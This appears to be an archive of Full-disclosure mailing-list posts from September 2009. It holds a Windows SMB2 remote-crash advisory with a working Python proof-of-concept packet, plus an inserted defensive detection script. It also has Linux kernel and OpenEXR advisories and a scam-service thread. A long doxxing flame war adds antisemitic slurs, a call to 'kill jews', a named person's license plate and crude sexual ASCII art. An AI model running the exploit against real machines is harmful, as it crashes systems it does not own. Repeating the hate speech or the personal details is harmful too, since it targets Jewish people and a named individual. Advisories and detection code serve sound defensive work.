EXR image file, an attacker could cause a denial of service via application
crash, or possibly execute arbitrary code with the privileges of the user
invoking the program. (CVE-2009-1720, CVE-2009-1721)

It was discovered that OpenEXR did not properly handle certain malformed
EXR image files. If a user were tricked into opening a crafted EXR image
file, an attacker could cause a denial of service via application crash, or
possibly execute arbitrary code with the privileges of the user invoking
the program. This issue only affected Ubuntu 8.04 LTS. (CVE-2009-1722)


Updated packages for Ubuntu 8.04 LTS:


Updated packages for Ubuntu 8.10:

  

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-14 Thread Randal T. Rioux
Scratch that - the version of 2008 I had wasn't an official R2 release. So
original reports still hold. It didn't crash my R2 build 7600.

Laurent, et al, has this been tried against an Itanium machine? Just
curious. Nobody at work will let me test the exploit against their Itanium
servers.

Randy

On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
 After testing my version of the exploit (using Java instead of Python) I
 tried it against a Windows Server 2008 R2 installation - it went down.

 http://www.procyonlabs.com/software/smb2_bsoder

 Randy


 laurent gaffie wrote:
 Advisory updated :


 =
 - Release date: September 7th, 2009
 - Discovered by: Laurent Gaffié
 - Severity: High
 =

 I. VULNERABILITY
 -
 Windows Vista, Server 2008  R2, 7 RC :
 SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

 II. BACKGROUND
 -
 Windows vista and newer Windows comes with a new SMB version named SMB2.
 See:
 http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
 for more details.

 III. DESCRIPTION
 -
 [Edit]Unfortunately this SMB2 security issue is specifically due to a MS
 patch, for another SMB2.0 security issue:
 KB942624 (MS07-063)
 Installing only this specific update on Vista SP0 creates the following
 issue:

 SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
 PROTOCOL REQUEST functionality.
 The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a
 SMB server, and it's used to identify the SMB dialect that will be used
 for further communication.

 IV. PROOF OF CONCEPT
 -

 Smb-Bsod.py:

 #!/usr/bin/python
 #When SMB2.0 recieve a  char in the Process Id High SMB header
 field
 #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

 from socket import socket

 host = IP_ADDR, 445
 buff = (
 \x00\x00\x00\x90 # Begin SMB header: Session message
 \xff\x53\x4d\x42 # Server Component: SMB
 \x72\x00\x00\x00 # Negociate Protocol
 \x00\x18\x53\xc8 # Operation 0x18  sub 0xc853
 \x00\x26# Process ID High: -- :) normal value should be \x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
 \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
 \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
 \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
 \x30\x30\x32\x00
 )
 s = socket()
 s.connect(host)
 s.send(buff)
 s.close()

 V. BUSINESS IMPACT
 -
 An attacker can remotely crash any Vista/Windows 7 machine with SMB
 enabled.
 Windows XP, 2k, are NOT affected as they don't have this driver.

 VI. SYSTEMS AFFECTED
 -
 [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
  R2, Windows 7 RC.

 VII. SOLUTION
 -
 No patch available for the moment.
 Close SMB feature and ports, until a patch is provided.
 Configure your firewall properly
 You can also follow the MS Workaround:
 http://www.microsoft.com/technet/security/advisory/975497.mspx

 VIII. REFERENCES
 -
 http://www.microsoft.com/technet/security/advisory/975497.mspx
 http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

 IX. CREDITS
 -
 This vulnerability has been discovered by Laurent Gaffié
 Laurent.gaffie{remove-this}(at)gmail.com

 X. REVISION HISTORY
 -
 September 7th, 2009: Initial release
 September 11th, 2009: Revision 1.0 release

 XI. LEGAL NOTICES
 -
 The information contained within this advisory is supplied as-is
 with no warranties or guarantees of fitness of use or otherwise.
 I accept no responsibility for any damage caused by the use or
 misuse of this information.

 XII.Personal Notes
 -
 Many persons have suggested to update this advisory for RCE and not
 BSOD:
 It won't be done, if they find a way to execute code, they will publish
 their advisory.
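
A detection-side counterpart to the advisory quoted above, as an added example that is not part of the original posts: it parses a NetBIOS-framed SMB1 header and flags NEGOTIATE PROTOCOL requests whose Process ID High field is non-zero (the advisory notes the normal value is \x00\x00). The function names and both sample frames are constructed for illustration.

```python
"""Flag SMB1 NEGOTIATE requests that carry a non-zero Process ID High.

Added illustration; names and sample frames are constructed here.
"""
import struct
from dataclasses import dataclass

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# 32-byte SMB1 header (little-endian) that follows the 4-byte NetBIOS
# session header: magic, command, status, flags, flags2, PIDHigh,
# signature, reserved, TID, PIDLow, UID, MID.
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")


@dataclass(frozen=True)
class Finding:
    suspicious: bool
    reason: str
    pid_high: int = 0
    dialects: tuple = ()

    @property
    def offers_smb2(self) -> bool:
        # True when the client listed an SMB2 dialect such as "SMB 2.002".
        return any(d.startswith("SMB 2") for d in self.dialects)


def parse_dialects(body: bytes) -> tuple:
    """Return the dialect strings from a NEGOTIATE body (starts at WordCount)."""
    if len(body) < 3:
        return ()
    offset = 1 + 2 * body[0]          # skip WordCount and parameter words
    if len(body) < offset + 2:
        return ()
    (byte_count,) = struct.unpack_from("<H", body, offset)
    data = body[offset + 2: offset + 2 + byte_count]
    # Each dialect is 0x02 + ASCII name + NUL.
    return tuple(
        chunk[1:].decode("ascii", "replace")
        for chunk in data.split(b"\x00")
        if chunk[:1] == b"\x02"
    )


def inspect_frame(frame: bytes) -> Finding:
    """Inspect one client-to-server frame captured on TCP/445."""
    if len(frame) < 4:
        return Finding(False, "too short for a NetBIOS session header")
    if frame[0] != 0x00:
        return Finding(False, "not a NetBIOS session message")
    declared = int.from_bytes(frame[1:4], "big")
    payload = frame[4:4 + declared]
    if len(payload) < SMB1_HEADER.size:
        return Finding(False, "truncated: no complete SMB1 header")
    magic, command, _status, _flags, _flags2, pid_high, *_rest = (
        SMB1_HEADER.unpack_from(payload)
    )
    if magic != SMB1_MAGIC:
        return Finding(False, "not an SMB1 message")
    if command != SMB_COM_NEGOTIATE:
        return Finding(False, "not a NEGOTIATE PROTOCOL request")
    dialects = parse_dialects(payload[SMB1_HEADER.size:])
    if pid_high != 0:
        return Finding(True, "non-zero Process ID High in NEGOTIATE",
                       pid_high, dialects)
    return Finding(False, "Process ID High is zero", 0, dialects)


def constructed_negotiate(pid_high: int, dialects) -> bytes:
    """Build a sample frame for the checks below (constructed test data)."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = SMB1_HEADER.pack(SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                              pid_high, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    payload = header + b"\x00" + struct.pack("<H", len(data)) + data
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


# Constructed samples: an ordinary request, and one whose PIDHigh bytes
# on the wire are 00 26 (little-endian value 0x2600).
BENIGN_FRAME = constructed_negotiate(0, ("NT LM 0.12", "SMB 2.002"))
ANOMALOUS_FRAME = constructed_negotiate(0x2600, ("NT LM 0.12",))

if __name__ == "__main__":
    for label, frame in (("benign", BENIGN_FRAME),
                         ("anomalous", ANOMALOUS_FRAME)):
        result = inspect_frame(frame)
        print(label, result.suspicious, result.reason,
              hex(result.pid_high), result.dialects)
```

The check is deliberately independent of the offered dialects, so it also flags requests that never reach the SMB2 driver; `offers_smb2` is there for triage.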






[Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-14 Thread full-censorship
D-vice lord@gmail.com wrote:
 To Dan, being well known is now the same as having your ass handed to ya by
 the like of me

now that we banned n3td3v can we ban dan kaminsky as well? ;)



Re: [Full-disclosure] Hack-Mail.net or similar site

2009-09-14 Thread mamo
On Sat, Sep 12, 2009 at 7:08 PM, Andrew Farmer andf...@gmail.com wrote:

 So, in other words, they're spoofing From addresses for profit. Clever.

I never tried them. I will just for fun (with my email address).
Perhaps they are doing something more smart (like brute forcing with
dictionary, use some virus or web attack or something else).

Mamo



Re: [Full-disclosure] Hack-Mail.net or similar site

2009-09-14 Thread maxigas
From: mamo mam...@gmail.com
Subject: Re: [Full-disclosure] Hack-Mail.net or similar site
Date: Mon, 14 Sep 2009 23:20:24 +0200

 On Sat, Sep 12, 2009 at 7:08 PM, Andrew Farmer andf...@gmail.com wrote:

 So, in other words, they're spoofing From addresses for profit. Clever.
 
 I never tried them. I will just for fun (with my email address).
 Perhaps they are doing something more smart (like brute forcing with
 dictionary, use some virus or web attack or something else).
 
 Mamo

tell us how it went, my guess was also that they are just setting that from=
address and that's it, so you don't get a working password after all.  but i
have no 20$ to test it.  :f

maxigas



[Full-disclosure] [ MDVSA-2009:233 ] kernel

2009-09-14 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:233
 http://www.mandriva.com/security/
 ___

 Package : kernel
 Date: September 14, 2009
 Affected: 2008.1, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in the Linux 2.6 kernel:
 
 The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4,
 does not initialize all function pointers for socket operations
 in proto_ops structures, which allows local users to trigger a NULL
 pointer dereference and gain privileges by using mmap to map page zero,
 placing arbitrary code on this page, and then invoking an unavailable
 operation, as demonstrated by the sendpage operation on a PF_PPPOX
 socket. (CVE-2009-2692)
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692
 ___

 Updated Packages:


[Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-14 Thread GOBBLES
  ___  ___  _  
| __ |  | |__] |__] ||___ [__  
|__] |__| |__] |__] |___ |___ ___] 

 _  _ ___  _ ___  _
|__| |\ | |  \ | |  \ |
|  | | \| |__/_| |__/ |___ 

Presents
=

Meet the exposed Andrew Aurenheimer. Also known as weev, 
weevlar,
weevlos, wbeelsoi. Former bantown member and a sysop at
encyclopediadramatica. He is a failed man. Loyalty to him shall 
bring
you no benefit. See for yourself:

Law enforcement authorities reportedly have identified a 21-year-
old Vancouver man as the individual who made two threatening 
telephone calls to Congregation Beth Israel on the night of June 16.

Jewish Federation of Greater Portland Community Relations Director 
Robert Horenstein said the suspect, whose name was not made public, 
“admitted making the calls and the FBI is now working with the U.S. 
Attorney’s office to determine if a crime has been committed.”

The alleged caller, whom authorities described to Horenstein as 
having “low intelligence and no means to carry out any threats,” 
reportedly said over the phone, “The Nazis are coming to get you; 
there will be another Holocaust” and “You killed my Lord. You will 
pay.”

The calls were left on the CBI’s voice mail system and were first 
heard the next morning by Rabbi Michael Cahana.

Cahana said, “I was very, very pleased at the responsiveness of the 
Portland Police and FBI. They gave us a strong sense that they were 
taking this seriously and we were in very good hands.”

The rabbi declined to elaborate on the incident.

Portland FBI spokeswoman Beth Anne Steele said her office could not 
comment on an ongoing investigation but that the FBI was “working 
closely with the folks at the temple as well as the Portland Police 
Bureau.”

Prior to police identification of the Vancouver man, Horenstein 
said in an e-mail alert that law enforcement officials had 
speculated the caller may have been a 24-year-old Los Angeles man 
who operates the Web site theiprophet.blip.tv/ (since taken 
offline) on which Jews have been vilified.

Horenstein identified that man as Andrew Auernheimer. In a video 
that was on Auernheimer’s Web site he said, “I’ve got to skip town. 
There are some big Jews that want to hand me a summons. …On the 
16th (of June) I am taking a pilgrimage northward to Portland.”

Auernheimer was detained and questioned by members of the FBI and 
the Portland Police Bureau, first in Grants Pass and later in 
Wilsonville, according to Horenstein.

Horenstein said, “Portland police now believe him to be a much 
lower-level threat than was believed previously, but stress that 
they will continue to monitor him.”

Auernheimer reportedly was warned not to go near any Jewish 
congregation or agency. Horenstein said he was told that 
Auernheimer had no plans to do so and that he claimed “he has no 
violent intentions.”

Horenstein said Auernheimer drives a 2000 silver Honda Civic with 
California license plate 6EFJ814 and was traveling with a Native 
American woman. He said that if Auernheimer is seen near any Jewish 
facility, authorities should be notified immediately by calling 911.

Horenstein expressed gratitude for the work of the law enforcement 
personnel: “We should all be deeply grateful to the FBI and 
Portland police, especially officers Brian Hughes and Tony Cavalli, 
for their commitment to keeping us all safe.”

Hughes referred inquiries to PPB spokeswoman Det. Mary Weed who did 
not return telephone calls before the Jewish Review’s press time.

Source: http://www.jewishreview.org/local/Police-question-two-men-
about-threats-to-Jewish-community
Archival: http://www.webcitation.org/5jnPBPyHG

Weev's response:
look at these fucking kikes how they fucking don't name the person 
who made the threats, but name me instead. it looks like i was 
responsible for it unless you read the article real hard.

i've been informed that the person who called in the synagogue 
threats was someone being blackmailed by a rabbi, and that he was 
assured immunity. this was a setup from the beginning to get me on 
the counterterrorism map so they could have my assets stolen and me 
criminally harassed.

seriously, there has to be something fucking libelous in the fact 
that i am the sole person named in this article when i had 
absolutely no involvement in it, and was not charged with any crime.

there is no fucking freedom of speech left in this country. if 
saying anything the establishment doesn't like results in attacks 
on someone's livelihood, noone will speak up against the criminal 
establishment.

Source: http://weev.livejournal.com/368013.html
Archival: http://www.webcitation.org/5jnP71qsD

Also weev posts his IRL name+handle on 
http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti
me.php. Archival: http://www.webcitation.org/5jnPc0pNy

I suppose crime doesn't pay.

If you've had any issues with weev / Andrew Aurenheimer, feel free 
to send in 

Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-14 Thread Andrew A
lol buddy i put my name in my own fuckin' blog its not like youve discovered
some big secret

also, i lol that it took the worlds most well funded law enforcement agency
working at the behest of the one true arm of satan just to dox me.

you dudes are sad.

lets smoke crack and kill jews.

On Mon, Sep 14, 2009 at 9:26 PM, GOBBLES j...@mac.hush.com wrote:

   ___  ___  _ 
 | __ |  | |__] |__] ||___ [__
 |__] |__| |__] |__] |___ |___ ___]

  _  _ ___  _ ___  _
 |__| |\ | |  \ | |  \ |
 |  | | \| |__/_| |__/ |___

 Presents
 =

 Meet the exposed Andrew Aurenheimer. Also known as weev,
 weevlar,
 weevlos, wbeelsoi. Former bantown member and a sysop at
 encyclopediadramatica. He is a failed man. Loyalty to him shall
 bring
 you no benefit. See for yourself:

 Law enforcement authorities reportedly have identified a 21-year-
 old Vancouver man as the individual who made two threatening
 telephone calls to Congregation Beth Israel on the night of June 16.

 Jewish Federation of Greater Portland Community Relations Director
 Robert Horenstein said the suspect, whose name was not made public,
 “admitted making the calls and the FBI is now working with the U.S.
 Attorney’s office to determine if a crime has been committed.”

 The alleged caller, whom authorities described to Horenstein as
 having “low intelligence and no means to carry out any threats,”
 reportedly said over the phone, “The Nazis are coming to get you;
 there will be another Holocaust” and “You killed my Lord. You will
 pay.”

 The calls were left on the CBI’s voice mail system and were first
 heard the next morning by Rabbi Michael Cahana.

 Cahana said, “I was very, very pleased at the responsiveness of the
 Portland Police and FBI. They gave us a strong sense that they were
 taking this seriously and we were in very good hands.”

 The rabbi declined to elaborate on the incident.

 Portland FBI spokeswoman Beth Anne Steele said her office could not
 comment on an ongoing investigation but that the FBI was “working
 closely with the folks at the temple as well as the Portland Police
 Bureau.”

 Prior to police identification of the Vancouver man, Horenstein
 said in an e-mail alert that law enforcement officials had
 speculated the caller may have been a 24-year-old Los Angeles man
 who operates the Web site theiprophet.blip.tv/ (since taken
 offline) on which Jews have been vilified.

 Horenstein identified that man as Andrew Auernheimer. In a video
 that was on Auernheimer’s Web site he said, “I’ve got to skip town.
 There are some big Jews that want to hand me a summons. …On the
 16th (of June) I am taking a pilgrimage northward to Portland.”

 Auernheimer was detained and questioned by members of the FBI and
 the Portland Police Bureau, first in Grants Pass and later in
 Wilsonville, according to Horenstein.

 Horenstein said, “Portland police now believe him to be a much
 lower-level threat than was believed previously, but stress that
 they will continue to monitor him.”

 Auernheimer reportedly was warned not to go near any Jewish
 congregation or agency. Horenstein said he was told that
 Auernheimer had no plans to do so and that he claimed “he has no
 violent intentions.”

 Horenstein said Auernheimer drives a 2000 silver Honda Civic with
 California license plate 6EFJ814 and was traveling with a Native
 American woman. He said that if Auernheimer is seen near any Jewish
 facility, authorities should be notified immediately by calling 911.

 Horenstein expressed gratitude for the work of the law enforcement
 personnel: “We should all be deeply grateful to the FBI and
 Portland police, especially officers Brian Hughes and Tony Cavalli,
 for their commitment to keeping us all safe.”

 Hughes referred inquiries to PPB spokeswoman Det. Mary Weed who did
 not return telephone calls before the Jewish Review’s press time.

 Source: http://www.jewishreview.org/local/Police-question-two-men-about-threats-to-Jewish-community
 Archival: http://www.webcitation.org/5jnPBPyHG

 Weev's response:
 look at these fucking kikes how they fucking don't name the person
 who made the threats, but name me instead. it looks like i was
 responsible for it unless you read the article real hard.

 i've been informed that the person who called in the synagogue
 threats was someone being blackmailed by a rabbi, and that he was
 assured immunity. this was a setup from the beginning to get me on
 the counterterrorism map so they could have my assets stolen and me
 criminally harassed.

 seriously, there has to be something fucking libelous in the fact
 that i am the sole person named in this article when i had
 absolutely no involvement in it, and was not charged with any crime.

 there is no fucking freedom of speech left in this country. if
 saying anything the establishment doesn't like results in attacks
 on someone's 

Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-14 Thread Valdis' Mustache
Herr Evron, Ms. Alder, and Dr. Krawetz:

While your valiant effort at cyberimpersonation is quite laudable, it
should be noted that mastery of ASCII graphics beyond the level of the
System V banner command is one (admittedly, non-lexicographically
fingerprintable) integral hallmark of the departed and
now-presumably-disbanded security lulz-mill you've attempted to
mimic, a critical ridge of the digital epidermis that your missive
fails to capture.

Indeed, at a minimum, a handful of opportunistically-placed simple
imagus penii , as below, would have yielded this post some
authenticity, e.g.:

8===D

) (uncircumcised)

8=D~~~ (ejaculate included)
  ___
 //  7
(_,_/\
 \\
  \\
  _\\__
 (   \ )
  \___\___/

(overly-detailed and unrenderable depending on native character set)

... Ad infinitum.

That said, your attempted Internet volleys have touched on a key
conundrum that has puzzled this mustache for some time wrt. the varied
and sundry security-centric cyber-Vasićka of the first decade of this
millennium's latter half.

Typically, this mustache has found anti-semitism and racism to have
ironclad utility as field tests for limited reasoning capabilities and
/ or sub-80 Terman-Binet scores within the boundaries of mental
retardation as proscribed by the DSM-IV.

And yet... The alleged Mr. Aurenheimer and his [redacted] cohorts are
demonstrably quite bright!

The resulting dichotomy has been rather troublesome to this mustache,
and has kept me awake, oft in spirited debate with my left and right
Sideburnian peers, on many a balmy autumn evening such as the one now
upon us.

At precisely this second (and admittedly bound to revision from moment
to passing moment), I can only conclude that Monsignor Weev is often
indeed doing that which he is best regarded for -- provoking a
visceral and disproportionate reaction in those too cynical to see
said intent -- when he espouses deeply held beliefs in such laughable
notions of race, a vein he has (or so it would seem) mined with much
success for many years.

I can only presume that (to use the parlance of the fora the young man
in question is known to frequent) this would indeed make you that
which is typically described as a lolcow.

In keeping with the vernacular of the Now, I include this informational graphic:

(__)
 (..)
/---\/
  /  ||  ||
 ||-||
*^^^

Apropos on numerous levels, the asterix on the far left quadrant does
indeed denote bullshit.


Your Humble Servant,
Вусы Валдзіс



On 9/14/09, GOBBLES j...@mac.hush.com wrote:
   ___  ___  _ 
 | __ |  | |__] |__] ||___ [__
 |__] |__| |__] |__] |___ |___ ___]

  _  _ ___  _ ___  _
 |__| |\ | |  \ | |  \ |
 |  | | \| |__/_| |__/ |___

 Presents
 =

 Meet the exposed Andrew Aurenheimer. Also known as weev,
 weevlar,
 weevlos, wbeelsoi. Former bantown member and a sysop at
 encyclopediadramatica. He is a failed man. Loyalty to him shall
 bring
 you no benefit. See for yourself:

 Law enforcement authorities reportedly have identified a 21-year-
 old Vancouver man as the individual who made two threatening
 telephone calls to Congregation Beth Israel on the night of June 16.

 Jewish Federation of Greater Portland Community Relations Director
 Robert Horenstein said the suspect, whose name was not made public,
 “admitted making the calls and the FBI is now working with the U.S.
 Attorney’s office to determine if a crime has been committed.”

 The alleged caller, whom authorities described to Horenstein as
 having “low intelligence and no means to carry out any threats,”
 reportedly said over the phone, “The Nazis are coming to get you;
 there will be another Holocaust” and “You killed my Lord. You will
 pay.”

 The calls were left on the CBI’s voice mail system and were first
 heard the next morning by Rabbi Michael Cahana.

 Cahana said, “I was very, very pleased at the responsiveness of the
 Portland Police and FBI. They gave us a strong sense that they were
 taking this seriously and we were in very good hands.”

 The rabbi declined to elaborate on the incident.

 Portland FBI spokeswoman Beth Anne Steele said her office could not
 comment on an ongoing investigation but that the FBI was “working
 closely with the folks at the temple as well as the Portland Police
 Bureau.”

 Prior to police identification of the Vancouver man, Horenstein
 said in an e-mail alert that law enforcement officials had
 speculated the caller may have been a 24-year-old Los Angeles man
 who operates the Web site theiprophet.blip.tv/ (since taken
 offline) on which Jews have been vilified.

 Horenstein identified that man as Andrew Auernheimer. In a video
 that was on Auernheimer’s Web site he said, “I’ve got to skip town.
 There are some big Jews that want to hand me a summons. …On the
 16th (of June) I am taking a pilgrimage northward to Portland.”

 Auernheimer was detained and 

Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-14 Thread GOBBLES
*grins like Cheshire cat*
*spins you around*

Oh weev, you try too hard.

You hold on to vanity like a 13 year old girl. That's what your
friends say. Or at least people who think are your friend.

I've been in contact with hep, sherrod degrippo, oclet and
tehdely about what a flatout nutter you are. And btw, last I
heard your vehicle's bugged for sound and GPS. Those dudes
handed over your logs. You got a mountain of people ready
to testify against you. Most will play buddy with you until
you get the iron cuffs slapped on. They gone el mariachi
on you bud. You think you can make a living off ads and
selling t-shirts? Use your fucking brain. Idiot.

You know your world's spinning before you, why don't you just give up.

Enjoy ^_^

Presents
=
Sorry about that. The JDL/GOBBLES team takes misspellings very
seriously.

Meet the exposed Andrew Auernheimer. Former bantown member and a
sysop at encyclopediadramatica.

Aliases:
 - weev
 - weevlar
 - weevlos
 - the iprophet
 - wbeelsoi

He is a failed man. Loyalty to him shall bring you no benefit. See for yourself:

Law enforcement authorities reportedly have identified a 21-year-
old Vancouver man as the individual who made two threatening
telephone calls to Congregation Beth Israel on the night of June 16.

Jewish Federation of Greater Portland Community Relations Director
Robert Horenstein said the suspect, whose name was not made public,
“admitted making the calls and the FBI is now working with the U.S.
Attorney’s office to determine if a crime has been committed.”

The alleged caller, whom authorities described to Horenstein as
having “low intelligence and no means to carry out any threats,”
reportedly said over the phone, “The Nazis are coming to get you;
there will be another Holocaust” and “You killed my Lord. You will
pay.”

The calls were left on the CBI’s voice mail system and were first
heard the next morning by Rabbi Michael Cahana.

Cahana said, “I was very, very pleased at the responsiveness of the
Portland Police and FBI. They gave us a strong sense that they were
taking this seriously and we were in very good hands.”

The rabbi declined to elaborate on the incident.

Portland FBI spokeswoman Beth Anne Steele said her office could not
comment on an ongoing investigation but that the FBI was “working
closely with the folks at the temple as well as the Portland Police
Bureau.”

Prior to police identification of the Vancouver man, Horenstein
said in an e-mail alert that law enforcement officials had
speculated the caller may have been a 24-year-old Los Angeles man
who operates the Web site theiprophet.blip.tv/ (since taken
offline) on which Jews have been vilified.

Horenstein identified that man as Andrew Auernheimer. In a video
that was on Auernheimer’s Web site he said, “I’ve got to skip town.
There are some big Jews that want to hand me a summons. …On the
16th (of June) I am taking a pilgrimage northward to Portland.”

Auernheimer was detained and questioned by members of the FBI and
the Portland Police Bureau, first in Grants Pass and later in
Wilsonville, according to Horenstein.

Horenstein said, “Portland police now believe him to be a much
lower-level threat than was believed previously, but stress that
they will continue to monitor him.”

Auernheimer reportedly was warned not to go near any Jewish
congregation or agency. Horenstein said he was told that
Auernheimer had no plans to do so and that he claimed “he has no
violent intentions.”

Horenstein said Auernheimer drives a 2000 silver Honda Civic with
California license plate 6EFJ814 and was traveling with a Native
American woman. He said that if Auernheimer is seen near any Jewish
facility, authorities should be notified immediately by calling 911.

Horenstein expressed gratitude for the work of the law enforcement
personnel: “We should all be deeply grateful to the FBI and
Portland police, especially officers Brian Hughes and Tony Cavalli,
for their commitment to keeping us all safe.”

Hughes referred inquiries to PPB spokeswoman Det. Mary Weed who did
not return telephone calls before the Jewish Review’s press time.

Source: http://www.jewishreview.org/local/Police-question-two-men-about-threats-to-Jewish-community
Archival: http://www.webcitation.org/5jnPBPyHG

Weev's response:
look at these fucking kikes how they fucking don't name the person
who made the threats, but name me instead. it looks like i was
responsible for it unless you read the article real hard.

i've been informed that the person who called in the synagogue
threats was someone being blackmailed by a rabbi, and that he was
assured immunity. this was a setup from the beginning to get me on
the counterterrorism map so they could have my assets stolen and me
criminally harassed.

seriously, there has to be something fucking libelous in the fact
that i am the sole person named in this article when i had
absolutely no involvement in it, and was not charged with any crime.

there is no fucking freedom of speech 

Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-14 Thread Andrew A
..
_ .'  `.
   /\)
  / /
 / /   /\
 \ \  /  \
  _   \ \/ /\ \
 (/\   \  /  \ \
  \ \  /  \  (Y )
   \ \/ /\ \  
\  /  \ \
 \/   / /
 / /
( Y)
 

GADI EVRON GONNA CALL THE JIZZTAPO ON ME

On Mon, Sep 14, 2009 at 11:37 PM, Valdis' Mustache 
securitas.must...@gmail.com wrote:

 Herr Evron, Ms. Alder, and Dr. Krawetz:

 While your valiant effort at cyberimpersonation is quite laudable, it
 should be noted that mastery of ASCII graphics beyond the level of the
 System V banner command is one (admittedly, non-lexicographically
 fingerprintable) integral hallmark of the departed and
 now-presumably-disbanded security lulz-mill you've attempted to
 mimic, a critical ridge of the digital epidermis that your missive
 fails to capture.

 Indeed, at a minimum, a handful of opportunistically-placed simple
 imagus penii , as below, would have yielded this post some
 authenticity, e.g.:

 8===D

 ) (uncircumcised)

 8=D~~~ (ejaculate included)
  ___
 //  7
(_,_/\
 \\
  \\
  _\\__
 (   \ )
  \___\___/

 (overly-detailed and unrenderable depending on native character set)

 ... Ad infinitum.

 That said, your attempted Internet volleys have touched on a key
 conundrum that has puzzled this mustache for some time wrt. the varied
 and sundry security-centric cyber-Vasićka of the first decade of this
 millennium's latter half.

 Typically, this mustache has found anti-semitism and racism to have
 ironclad utility as field tests for limited reasoning capabilities and
 / or sub-80 Terman-Binet scores within the boundaries of mental
 retardation as proscribed by the DSM-IV.

 And yet... The alleged Mr. Aurenheimer and his [redacted] cohorts are
 demonstrably quite bright!

 The resulting dichotomy has been rather troublesome to this mustache,
 and has kept me awake, oft in spirited debate with my left and right
 Sideburnian peers, on many a balmy autumn evening such as the one now
 upon us.

 At precisely this second (and admittedly bound to revision from moment
 to passing moment), I can only conclude that Monsignor Weev is often
 indeed doing that which he is best regarded for -- provoking a
 visceral and disproportionate reaction in those too cynical to see
 said intent -- when he espouses deeply held beliefs in such laughable
 notions of race, a vein he has (or so it would seem) mined with much
 success for many years.

 I can only presume that (to use the parlance of the fora the young man
 in question is known to frequent) this would indeed make you that
 which is typically described as a lolcow.

 In keeping with the vernacular of the Now, I include this informational
 graphic:

(__)
 (..)
/---\/
  /  ||  ||
 ||-||
 *^^^

 Apropos on numerous levels, the asterix on the far left quadrant does
 indeed denote bullshit.


 Your Humble Servant,
 Вусы Валдзіс



 On 9/14/09, GOBBLES j...@mac.hush.com wrote:
    ___  ___  _ 
  | __ |  | |__] |__] ||___ [__
  |__] |__| |__] |__] |___ |___ ___]
 
   _  _ ___  _ ___  _
  |__| |\ | |  \ | |  \ |
  |  | | \| |__/_| |__/ |___
 
  Presents
  =
 
  Meet the exposed Andrew Aurenheimer. Also known as weev,
  weevlar,
  weevlos, wbeelsoi. Former bantown member and a sysop at
  encyclopediadramatica. He is a failed man. Loyalty to him shall
  bring
  you no benefit. See for yourself:
 
  Law enforcement authorities reportedly have identified a 21-year-
  old Vancouver man as the individual who made two threatening
  telephone calls to Congregation Beth Israel on the night of June 16.
 
  Jewish Federation of Greater Portland Community Relations Director
  Robert Horenstein said the suspect, whose name was not made public,
  “admitted making the calls and the FBI is now working with the U.S.
  Attorney’s office to determine if a crime has been committed.”
 
  The alleged caller, whom authorities described to Horenstein as
  having “low intelligence and no means to carry out any threats,”
  reportedly said over the phone, “The Nazis are coming to get you;
  there will be another Holocaust” and “You killed my Lord. You will
  pay.”
 
  The calls were left on the CBI’s voice mail system and were first
  heard the next morning by Rabbi Michael Cahana.
 
  Cahana said, “I was very, very pleased at the responsiveness of the
  Portland Police and FBI. They gave us a strong sense that they were
  taking this seriously and we were in very good hands.”
 
  The rabbi declined to elaborate on the incident.
 
  Portland FBI spokeswoman Beth Anne Steele said her office could not
  comment on an ongoing investigation but that the FBI was “working
  closely with the folks at the temple as well as the Portland Police
  Bureau.”
 
  Prior to police identification of the Vancouver man, Horenstein
  said in an e-mail alert that law enforcement officials had
  speculated the caller may 

Re: [Full-disclosure] Hack-Mail.net or similar site

2009-09-14 Thread Augusto Pereyra
I think this service is fake.

To make a portal like this you only need a PHP form with the
following fields: Account to Hack, Account to send password.

A client fills in this form and three days later the server sends a
spoofed mail acting like they have the password of the account
requested in the previous form. When the client puts his faith in this
kind of cheat, he pays the cash and maybe some kind of trash is sent to
his account.

